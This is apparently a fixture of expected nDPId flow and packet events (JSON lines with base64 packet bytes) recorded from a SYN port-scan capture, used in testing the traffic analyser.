+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs+cAAADsGE7KsEAAIQA2GNIzTHCHdU4MZAAAAAGACEAAMawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsIVwAADQG8xasEAAIQA2GNIzTF9rdU4MZAAAAAGACBAAcsgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AACYGVUOsEAAIQA2GNIzTI1rdU4MZAAAAAGACDAAJMgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"synscan.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsE4oAACwGCOmsEAAIQA2GNIzTEPfdU4MZAAAAAGACBAAjlQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"synscan.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAscS4AADIGpUSsEAAIQA2GNIzTH0ndU4MZAAAAAGACDAANQwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsB1sAACgGGRisEAAIQA2GNIzTBR3dU4MZAAAAAGACBAAvbwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":83,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"synscan.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsAs8AADoGC6SsEAAIQA2GNIzTAFPdU4MZAAAAAGACDAAsOQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAACkG612sEAAIQA2GNIzT1DjdU4MZAAAAAGACCABcUwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ5MAADsGpd+sEAAIQA2GNIzTEWHdU4MZAAAAAGACEAAXKwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AAC8GIcSsEAAIQA2GNIzTG1ndU4MZAAAAAGACEAANMwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsC84AAC0GD6WsEAAIQA2GNIzTJ8TdU4MZAAAAAGACCAAIyAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuYAADAG+YysEAAIQA2GNIzTDwvdU4MZAAAAAGACBAAlgQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7cAADgGALysEAAIQA2GNIzTG7zdU4MZAAAAAGACBAAY0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAspxIAAC0GdGCsEAAIQA2GNIzSBMLdUoMYAAAAAGACCAArzQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsBn4AACYGG\/WsEAAIQA2GNIzSS3PdUoMYAAAAAGACDADhGwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs43YAACwGOPysEAAIQA2GNIzSTYLdUoMYAAAAAGACBADnDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsg1oAAC4GlxisEAAIQA2GNIzSDdrdUoMYAAAAAGACDAAetQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsI3IAAC4G9wCsEAAIQA2GNIzSBD7dUoMYAAAAAGACDAAoUQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAstG0AADoGWgWsEAAIQA2GNIzSBBzdUoMYAAAAAGACDAAocwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAssh8AAC8GZ1OsEAAIQA2GNIzSD5vdUoMYAAAAAGACEAAY9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsqVsAACsGdBesEAAIQA2GNIzSEyTdUoMYAAAAAGACEAAVawAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAshXIAADcGjACsEAAIQA2GNIzSdTDdUoMYAAAAAGACEACzXgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsTHsAACYG1fesEAAIQA2GNIzSACrdUoMYAAAAAGACDAAsZQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAscHUAADUGov2sEAAIQA2GNIzSySXdUoMYAAAAAGACCABnaQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsCSMAADAGD1CsEAAIQA2GNIzSIADdUoMYAAAAAGACBAAUjwAAAgQFtA=="} 